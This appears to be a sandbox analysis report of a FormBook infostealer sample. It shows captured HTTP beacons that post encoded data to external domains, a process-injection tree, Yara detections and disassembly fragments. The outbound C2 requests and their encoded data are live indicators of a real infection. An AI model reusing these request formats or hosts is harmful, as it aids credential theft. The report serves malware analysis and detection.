                                                                                                           Oct 7, 2024 15:57:29.430828094 CEST | 419 | OUT | GET /ml5l/?EjLdUJJ=q39FRlrjXh2BAZ2an0Y0b+wnoW9u3vRxeQ2ev9PxWnLSwGTc53vym4zMKhd+m8E/J85vcAPus+7jLKqTLJL7q40+dEWWJZUlJWs+YYUwQiQqX1T+EQ==&WLUDu=SXq8yrvPVd3tf HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.pakmartcentral.shop
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                           Oct 7, 2024 15:57:29.867510080 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Server: hcdn
                                                                                                            Date: Mon, 07 Oct 2024 13:57:29 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 10072
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            x-hcdn-request-id: c359f9007fa76b5b1a72c1b9e8473055-bos-edge1
                                                                                                            Expires: Mon, 07 Oct 2024 13:57:28 GMT
                                                                                                            Cache-Control: no-cache
                                                                                                            Accept-Ranges: bytes
                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                                                            Oct 7, 2024 15:57:29.867527962 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                                                            Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                                                            Oct 7, 2024 15:57:29.867538929 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                                                            Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                                                            Oct 7, 2024 15:57:29.867597103 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                                                                            Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                                                                            Oct 7, 2024 15:57:29.867607117 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                                                                            Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                                                                            Oct 7, 2024 15:57:29.867618084 CEST1236INData Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                                                                                            Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                                                                                            Oct 7, 2024 15:57:29.867628098 CEST776INData Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                                                                                            Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                                                                                            Oct 7, 2024 15:57:29.867640018 CEST1236INData Raw: 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67 74 68 3b 66
                                                                                                            Data Ascii: )}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input
                                                                                                            Oct 7, 2024 15:57:29.867793083 CEST984INData Raw: 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b 69 3c 76 3b
                                                                                                            Data Ascii: (m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=


Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
37           192.168.2.9   50012         194.58.112.174   80                 6568   C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe

Timestamp                             Bytes transferred   Direction   Data
Oct 7, 2024 15:57:35.131022930 CEST   686                 OUT         POST /74ou/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.les-massage.online
                                                                                                            Origin: http://www.les-massage.online
                                                                                                            Referer: http://www.les-massage.online/74ou/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ=6kOsoZB1YxAvi5CYBGl+vFPBJus9tNCvSNXFZCcEDRgaTRvRfXk5nYk2aPJARbOe8ND5t76Ojpa3OHNZMSE/+g9aHqlhSqw9XhHMH+oG+8ivYujnaceOCfmGeh7i9Ch83XGgEErAc9F5OydhWCnP4KKtxBgUP4E4mfGwzb37nJEt1VjsS9f1r6PTqsrT
Oct 7, 2024 15:57:35.779932022 CEST   1236                IN          HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 07 Oct 2024 13:57:35 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip


Session ID   Source IP     Source Port   Destination IP   Destination Port
38           192.168.2.9   50013         194.58.112.174   80

Timestamp                             Bytes transferred   Direction   Data
Oct 7, 2024 15:57:38.297415972 CEST   710                 OUT         POST /74ou/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.les-massage.online
                                                                                                            Origin: http://www.les-massage.online
                                                                                                            Referer: http://www.les-massage.online/74ou/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ=6kOsoZB1YxAviaKYNBx+tlPAQes909CrSNLFZAwqDDEaS0LReVc5q4k2OfJFe7Oj8NOMt6GOjqm3OG9ZMlo4xQ9EIKljNaw9XhHMH+9d+8qvYeTnb9ePK/mFZh7irCg33XGOEFnmc7J5OzthH27QyKKr9Rhjf6tRqsKux6HB06pO/UDyDPWu+tP0tLi7NkZBELiQcze1FSYtPwK8YQ==
Oct 7, 2024 15:57:38.948949099 CEST   1236                IN          HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 07 Oct 2024 13:57:38 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip


                                                                                                            Target ID:0
                                                                                                            Start time:09:54:30
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Users\user\Desktop\YSjOEAta07.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\YSjOEAta07.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'361'945 bytes
                                                                                                            MD5 hash:EB0F7C655C78976889355AA35A43DD38
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:2
                                                                                                            Start time:09:54:36
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\YSjOEAta07.exe"
                                                                                                            Imagebase:0x620000
                                                                                                            File size:46'504 bytes
                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:09:54:39
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe"
                                                                                                            Imagebase:0x2b0000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:4
                                                                                                            Start time:09:54:41
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\replace.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\replace.exe"
                                                                                                            Imagebase:0xc00000
                                                                                                            File size:18'944 bytes
                                                                                                            MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            Target ID:8
                                                                                                            Start time:09:54:54
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe"
                                                                                                            Imagebase:0x2b0000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:9
                                                                                                            Start time:09:55:06
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x7ff73feb0000
                                                                                                            File size:676'768 bytes
                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true


                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.4%
                                                                                                              Dynamic/Decrypted Code Coverage:5.3%
                                                                                                              Signature Coverage:8.3%
                                                                                                              Total number of Nodes:132
                                                                                                              Total number of Limit Nodes:10

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: YYP
                                                                                                              • API String ID: 0-3579722852
                                                                                                              • Opcode ID: 113978638282103915def066ad1298d41a2fb2d7ff7c963717b5491b04342eae
                                                                                                              • Instruction ID: fe1ad6525b362cfe2ce52d82069e34ae102986fd448c9d6f639efb77696189a1
                                                                                                              • Opcode Fuzzy Hash: 113978638282103915def066ad1298d41a2fb2d7ff7c963717b5491b04342eae
                                                                                                              • Instruction Fuzzy Hash: 71F190B1D0021AAFDB24DFA5CC85AEFB7B8AF44304F1481AEE504A7341DB745A85CFA5

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 439 4175e3-41760c call 42f283 442 417612-417620 call 42f883 439->442 443 41760e-417611 439->443 446 417630-417641 call 42dbc3 442->446 447 417622-41762d call 42fb23 442->447 452 417643-417657 LdrLoadDll 446->452 453 41765a-41765d 446->453 447->446 452->453
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417655
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: e7dc6d0ee477ae157b340f19dc69921457d9f0c8687afbf7a2d1384491327b0c
                                                                                                              • Instruction ID: eb69db9bf8efaa2986cfdf4e607c5fc29a595e1f23a385f08c3c14a7654462b5
                                                                                                              • Opcode Fuzzy Hash: e7dc6d0ee477ae157b340f19dc69921457d9f0c8687afbf7a2d1384491327b0c
                                                                                                              • Instruction Fuzzy Hash: 7C015EB5E0020DABDB10DBE5DC52FDEB778AB54308F4041AAE90897240F635EB488BA5

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 459 42c473-42c4af call 404943 call 42d6b3 NtClose
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,0041619F,001F0001,?,00000000,?,?,00000104), ref: 0042C4AA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: ebf29b646508c508d37512dd22707bb04d2719e0d3e88c71623cf21526a7a6a3
                                                                                                              • Instruction ID: 8b6fd2d197a79738d68bafe02d71fa64aeff148017ff762ec0e8b83a03f38cc0
                                                                                                              • Opcode Fuzzy Hash: ebf29b646508c508d37512dd22707bb04d2719e0d3e88c71623cf21526a7a6a3
                                                                                                              • Instruction Fuzzy Hash: 4DE04F752142147BD620BA6ADC01F9B775CDFC9714F40442AFA0CA7242C6717A118AF4
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: b4f3a1170504b4744c6d099657bf5158c837aa7d99a25628a80a9163ffb8dc0e
                                                                                                              • Instruction ID: 6d3f0a7fd700c1af7b1ee7544ffee1e5ba14dcc11acc517313fb4e5bdb75c2d1
                                                                                                              • Opcode Fuzzy Hash: b4f3a1170504b4744c6d099657bf5158c837aa7d99a25628a80a9163ffb8dc0e
                                                                                                              • Instruction Fuzzy Hash: FE90023260550803D100B2584554746100687D0305FA5C461A042856DD87A58A51A5A2
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 0c499df046c512179ab2ca315732b3dcac7c1234cf9ee3d4079343c0d4957894
                                                                                                              • Instruction ID: 6883436cc4b3e33e1af51a918e60fb2c4cb71e64b60be0741dbec88ddb88343b
                                                                                                              • Opcode Fuzzy Hash: 0c499df046c512179ab2ca315732b3dcac7c1234cf9ee3d4079343c0d4957894
                                                                                                              • Instruction Fuzzy Hash: E2900262202404034105B2584454656400B87E0305B95C071E1018595DC6358991A125
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 7130a6a674fdb51d6b48f789b9495427c2b3d95c70cf064f85dd9981c749d969
                                                                                                              • Instruction ID: 2677b3914d151947ea7724144869cbad44b00278486d6215f6e4e6afbbbea5f4
                                                                                                              • Opcode Fuzzy Hash: 7130a6a674fdb51d6b48f789b9495427c2b3d95c70cf064f85dd9981c749d969
                                                                                                              • Instruction Fuzzy Hash: E990023220140813D111B2584544747000A87D0345FD5C462A042855DD97668A52E121
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: dd6eb4b0f19c5d051a2a5bb2af1d6b901362b0308c6881cf29d08942137d6d16
                                                                                                              • Instruction ID: 5f60b8b7f756a153d514387fa12c55004aaa805e28d7c1bb60b70dd5cae4abfb
                                                                                                              • Opcode Fuzzy Hash: dd6eb4b0f19c5d051a2a5bb2af1d6b901362b0308c6881cf29d08942137d6d16
                                                                                                              • Instruction Fuzzy Hash: 1490023220148C03D110B258844478A000687D0305F99C461A442865DD87A58991B121

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(6U0173jM,00000111,00000000,00000000), ref: 00413E8A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 6U0173jM$6U0173jM
                                                                                                              • API String ID: 1836367815-1980910963
                                                                                                              • Opcode ID: 0c8b893c510d0dcaf08578d5b6df2875e19754c40e04aac85f8afd7264447134
                                                                                                              • Instruction ID: fea165e1381c19dd71759ed6335f3e35b894f11218b1a295a30d0f045c5b477b
                                                                                                              • Opcode Fuzzy Hash: 0c8b893c510d0dcaf08578d5b6df2875e19754c40e04aac85f8afd7264447134
                                                                                                              • Instruction Fuzzy Hash: 5B01D6B2D0025C7BEB11AAE59C81DEFBB7CDF40398F448069FA14A7241D6784F064BA5

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 15 413de7-413dec 16 413e32-413e45 call 42f033 15->16 17 413dee 15->17 20 413e4b-413e7d call 4048b3 call 424d23 16->20 21 413e46 call 4175e3 16->21 17->16 26 413e9d-413ea3 20->26 27 413e7f-413e8e PostThreadMessageW 20->27 21->20 27->26 28 413e90-413e9a 27->28 28->26
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(6U0173jM,00000111,00000000,00000000), ref: 00413E8A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 6U0173jM$6U0173jM
                                                                                                              • API String ID: 1836367815-1980910963
                                                                                                              • Opcode ID: fb4e05768b21ddeb1c04338f038ed874d0e7281a6d2481d082ba2c8e610aa072
                                                                                                              • Instruction ID: e752819fb37ed903d7967cebaff85f9e43f1b515d786eb7c96f0e76a13d88736
                                                                                                              • Opcode Fuzzy Hash: fb4e05768b21ddeb1c04338f038ed874d0e7281a6d2481d082ba2c8e610aa072
                                                                                                              • Instruction Fuzzy Hash: 5101D672D0025C7BEB00AAA19C81DFFA77CDF81358F41816AF908A7201D53D4E064BE5

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 29 413dcf-413e7d call 4175e3 call 4048b3 call 424d23 37 413e9d-413ea3 29->37 38 413e7f-413e8e PostThreadMessageW 29->38 38->37 39 413e90-413e9a 38->39 39->37
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(6U0173jM,00000111,00000000,00000000), ref: 00413E8A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 6U0173jM$6U0173jM
                                                                                                              • API String ID: 1836367815-1980910963
